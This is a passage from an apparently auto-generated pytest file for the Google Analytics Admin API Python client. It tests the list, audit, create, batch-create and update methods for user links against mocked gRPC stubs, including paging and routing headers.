call.mock_calls[0] assert args[0] == analytics_admin.ListUserLinksRequest() @pytest.mark.asyncio async def test_list_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListUserLinksRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListUserLinksResponse( next_page_token="next_page_token_value", ) ) response = await client.list_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListUserLinksAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_user_links_async_from_dict(): await test_list_user_links_async(request_type=dict) def test_list_user_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: call.return_value = analytics_admin.ListUserLinksResponse() client.list_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_user_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListUserLinksResponse() ) await client.list_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_user_links_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListUserLinksResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_user_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_user_links_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_user_links( analytics_admin.ListUserLinksRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_user_links_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListUserLinksResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListUserLinksResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_user_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_user_links_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_user_links( analytics_admin.ListUserLinksRequest(), parent="parent_value", ) def test_list_user_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListUserLinksResponse( user_links=[ resources.UserLink(), resources.UserLink(), resources.UserLink(), ], next_page_token="abc", ), analytics_admin.ListUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(),], next_page_token="ghi", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(), resources.UserLink(),], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_user_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.UserLink) for i in results) def test_list_user_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListUserLinksResponse( user_links=[ resources.UserLink(), resources.UserLink(), resources.UserLink(), ], next_page_token="abc", ), analytics_admin.ListUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(),], next_page_token="ghi", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(), resources.UserLink(),], ), RuntimeError, ) pages = list(client.list_user_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_user_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_user_links), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListUserLinksResponse( user_links=[ resources.UserLink(), resources.UserLink(), resources.UserLink(), ], next_page_token="abc", ), analytics_admin.ListUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(),], next_page_token="ghi", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(), resources.UserLink(),], ), RuntimeError, ) async_pager = await client.list_user_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.UserLink) for i in responses) @pytest.mark.asyncio async def test_list_user_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_user_links), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListUserLinksResponse( user_links=[ resources.UserLink(), resources.UserLink(), resources.UserLink(), ], next_page_token="abc", ), analytics_admin.ListUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(),], next_page_token="ghi", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(), resources.UserLink(),], ), RuntimeError, ) pages = [] async for page_ in (await client.list_user_links(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_audit_user_links( transport: str = "grpc", request_type=analytics_admin.AuditUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.AuditUserLinksResponse( next_page_token="next_page_token_value", ) response = client.audit_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.AuditUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.AuditUserLinksPager) assert response.next_page_token == "next_page_token_value" def test_audit_user_links_from_dict(): test_audit_user_links(request_type=dict) def test_audit_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: client.audit_user_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.AuditUserLinksRequest() @pytest.mark.asyncio async def test_audit_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.AuditUserLinksRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.AuditUserLinksResponse( next_page_token="next_page_token_value", ) ) response = await client.audit_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.AuditUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.AuditUserLinksAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_audit_user_links_async_from_dict(): await test_audit_user_links_async(request_type=dict) def test_audit_user_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.AuditUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: call.return_value = analytics_admin.AuditUserLinksResponse() client.audit_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_audit_user_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.AuditUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.AuditUserLinksResponse() ) await client.audit_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_audit_user_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.AuditUserLinksResponse( user_links=[ resources.AuditUserLink(), resources.AuditUserLink(), resources.AuditUserLink(), ], next_page_token="abc", ), analytics_admin.AuditUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(),], next_page_token="ghi", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(), resources.AuditUserLink(),], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.audit_user_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.AuditUserLink) for i in results) def test_audit_user_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.AuditUserLinksResponse( user_links=[ resources.AuditUserLink(), resources.AuditUserLink(), resources.AuditUserLink(), ], next_page_token="abc", ), analytics_admin.AuditUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(),], next_page_token="ghi", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(), resources.AuditUserLink(),], ), RuntimeError, ) pages = list(client.audit_user_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_audit_user_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.audit_user_links), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.AuditUserLinksResponse( user_links=[ resources.AuditUserLink(), resources.AuditUserLink(), resources.AuditUserLink(), ], next_page_token="abc", ), analytics_admin.AuditUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(),], next_page_token="ghi", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(), resources.AuditUserLink(),], ), RuntimeError, ) async_pager = await client.audit_user_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.AuditUserLink) for i in responses) @pytest.mark.asyncio async def test_audit_user_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.audit_user_links), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.AuditUserLinksResponse( user_links=[ resources.AuditUserLink(), resources.AuditUserLink(), resources.AuditUserLink(), ], next_page_token="abc", ), analytics_admin.AuditUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(),], next_page_token="ghi", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(), resources.AuditUserLink(),], ), RuntimeError, ) pages = [] async for page_ in (await client.audit_user_links(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_create_user_link( transport: str = "grpc", request_type=analytics_admin.CreateUserLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) response = client.create_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateUserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.UserLink) assert response.name == "name_value" assert response.email_address == "email_address_value" assert response.direct_roles == ["direct_roles_value"] def test_create_user_link_from_dict(): test_create_user_link(request_type=dict) def test_create_user_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_user_link), "__call__") as call: client.create_user_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateUserLinkRequest() @pytest.mark.asyncio async def test_create_user_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateUserLinkRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) ) response = await client.create_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateUserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.UserLink) assert response.name == "name_value" assert response.email_address == "email_address_value" assert response.direct_roles == ["direct_roles_value"] @pytest.mark.asyncio async def test_create_user_link_async_from_dict(): await test_create_user_link_async(request_type=dict) def test_create_user_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateUserLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_user_link), "__call__") as call: call.return_value = resources.UserLink() client.create_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_user_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateUserLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_user_link), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) await client.create_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_user_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_user_link( parent="parent_value", user_link=resources.UserLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].user_link == resources.UserLink(name="name_value") def test_create_user_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_user_link( analytics_admin.CreateUserLinkRequest(), parent="parent_value", user_link=resources.UserLink(name="name_value"), ) @pytest.mark.asyncio async def test_create_user_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_user_link( parent="parent_value", user_link=resources.UserLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].user_link == resources.UserLink(name="name_value") @pytest.mark.asyncio async def test_create_user_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_user_link( analytics_admin.CreateUserLinkRequest(), parent="parent_value", user_link=resources.UserLink(name="name_value"), ) def test_batch_create_user_links( transport: str = "grpc", request_type=analytics_admin.BatchCreateUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_create_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.BatchCreateUserLinksResponse() response = client.batch_create_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchCreateUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.BatchCreateUserLinksResponse) def test_batch_create_user_links_from_dict(): test_batch_create_user_links(request_type=dict) def test_batch_create_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_create_user_links), "__call__" ) as call: client.batch_create_user_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchCreateUserLinksRequest() @pytest.mark.asyncio async def test_batch_create_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.BatchCreateUserLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_create_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.BatchCreateUserLinksResponse() ) response = await client.batch_create_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchCreateUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.BatchCreateUserLinksResponse) @pytest.mark.asyncio async def test_batch_create_user_links_async_from_dict(): await test_batch_create_user_links_async(request_type=dict) def test_batch_create_user_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.BatchCreateUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_create_user_links), "__call__" ) as call: call.return_value = analytics_admin.BatchCreateUserLinksResponse() client.batch_create_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_batch_create_user_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.BatchCreateUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_create_user_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.BatchCreateUserLinksResponse() ) await client.batch_create_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_update_user_link( transport: str = "grpc", request_type=analytics_admin.UpdateUserLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) response = client.update_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateUserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.UserLink) assert response.name == "name_value" assert response.email_address == "email_address_value" assert response.direct_roles == ["direct_roles_value"] def test_update_user_link_from_dict(): test_update_user_link(request_type=dict) def test_update_user_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_user_link), "__call__") as call: client.update_user_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateUserLinkRequest() @pytest.mark.asyncio async def test_update_user_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateUserLinkRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) ) response = await client.update_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateUserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.UserLink) assert response.name == "name_value" assert response.email_address == "email_address_value" assert response.direct_roles == ["direct_roles_value"] @pytest.mark.asyncio async def test_update_user_link_async_from_dict(): await test_update_user_link_async(request_type=dict) def test_update_user_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateUserLinkRequest() request.user_link.name = "user_link.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_user_link), "__call__") as call: call.return_value = resources.UserLink() client.update_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "user_link.name=user_link.name/value",) in kw[ "metadata" ] @pytest.mark.asyncio async def test_update_user_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateUserLinkRequest() request.user_link.name = "user_link.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_user_link), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) await client.update_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "user_link.name=user_link.name/value",) in kw[ "metadata" ] def test_update_user_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_user_link(user_link=resources.UserLink(name="name_value"),) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].user_link == resources.UserLink(name="name_value") def test_update_user_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_user_link( analytics_admin.UpdateUserLinkRequest(), user_link=resources.UserLink(name="name_value"), ) @pytest.mark.asyncio async def test_update_user_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_user_link( user_link=resources.UserLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].user_link == 